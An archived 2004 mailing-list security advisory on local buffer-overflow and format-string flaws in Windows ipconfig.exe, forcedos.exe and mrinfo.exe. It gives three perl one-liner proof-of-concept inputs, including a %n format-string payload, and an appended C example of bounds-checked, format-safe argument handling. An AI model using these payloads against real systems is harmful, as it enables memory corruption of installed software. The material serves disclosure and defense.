[Full-Disclosure] Microsoft Windows cmd line tools BOFs

From: Martin Eiszner (m.eiszner_at_sec-consult.com)
Date: 11/17/04

    To: full-disclosure@lists.netsys.com
    Date: Wed, 17 Nov 2004 09:02:36 +0100

    ========================================
    Microsoft command-line tools BOFs
    ========================================

    Product: Windows-2000 SP4 / Windows-XP SP2

    Vulnerabilities:

    - Buffer Overflow (no privilege escalation)

    Vendor: Microsoft (http://www.microsoft.com/)
    Vendor-Status: vendor contacted (between 2002 and 2003)
    Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available

    Objects: ipconfig.exe / forcedos.exe / mrinfo.exe

    Exploitable:
    Local: PARTIAL
    Remote: NO

    ============
    Introduction
    ============

    ---
    =====================
    Vulnerability Details
    =====================
    1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
    =======================================================
    OBJECTS:
    ipconfig.exe (only Windows-2000 SP4)
    forcedos.exe
    mrinfo.exe
    DESCRIPTION:
    Insufficient input validation leads to a) stack-based buffer overflows and b) format string vulnerabilities.
    EXAMPLES:
    a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
    b) forcedos.exe `perl -e 'print "A"x6784;'`
    c) mrinfo.exe -i `perl -e 'print "A"x60;'`
    ===============
    GENERAL REMARKS
    ===============
    Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html).
    It is unlikely that you will gain access or elevate privileges through "forcedos.exe" and "mrinfo.exe".
    Nevertheless it might be possible to misuse "ipconfig.exe" in a "restricted" environment with DHCP enabled !!
    ====================
    Recommended Hotfixes
    ====================
    ---
    EOF @2003 Brereton_paul@btinternet.com,m.eiszner@sec-consult.com
    =======
    Contact
    =======
    SEC-CONSULT
    UK / EUROPE
    Austria / EUROPE
    Brereton_paul@btinternet.com
    m.eiszner@sec-consult.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
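The two defect classes the advisory lists (an unchecked argument length copied into a stack buffer, and an argument handed to a printf-style routine as the format itself) are illustrated below in hardened form. This is an added example, not code from the advisory or from the Microsoft tools; the 64-byte buffer size and the function names are assumptions chosen for illustration, and the inputs in the comments mirror the advisory's test strings.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size stack buffer for an option such as an interface name. */
#define ARG_MAX_LEN 63          /* leaves room for the terminating NUL */

/* Copy a command-line argument into a fixed-size buffer only if it fits.
   Returns 1 on success, 0 if the argument is too long. Over-long input
   (e.g. the advisory's 6784-byte forcedos argument) is rejected, not
   truncated silently, so the caller can report it. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= dst_size)        /* would overflow: refuse, leave dst untouched */
        return 0;
    memcpy(dst, arg, len + 1);  /* bounded copy, includes the NUL */
    return 1;
}

/* Emit user input only as data, never as the format string.
   Returns bytes written, or -1 if the output buffer was too small. */
int report_arg(char *out, size_t out_size, const char *arg)
{
    /* "%s" is the format; arg is copied verbatim, so "%08x" or "%n"
       inside it is inert text rather than a directive. */
    int n = snprintf(out, out_size, "argument: %s", arg);
    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return n;
}

/* Detection aid: does an argument carry printf directives at all?
   Useful for logging or alerting on suspicious input, not as the sole control. */
int has_format_directive(const char *arg)
{
    return strchr(arg, '%') != NULL;
}

int main(int argc, char **argv)
{
    char iface[ARG_MAX_LEN + 1];
    char line[128];
    if (argc < 2) return 1;
    if (!copy_arg_checked(iface, sizeof iface, argv[1])) {
        fputs("argument too long\n", stderr);
        return 2;
    }
    if (report_arg(line, sizeof line, iface) < 0) return 3;
    puts(line);
    return 0;
}
```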
    
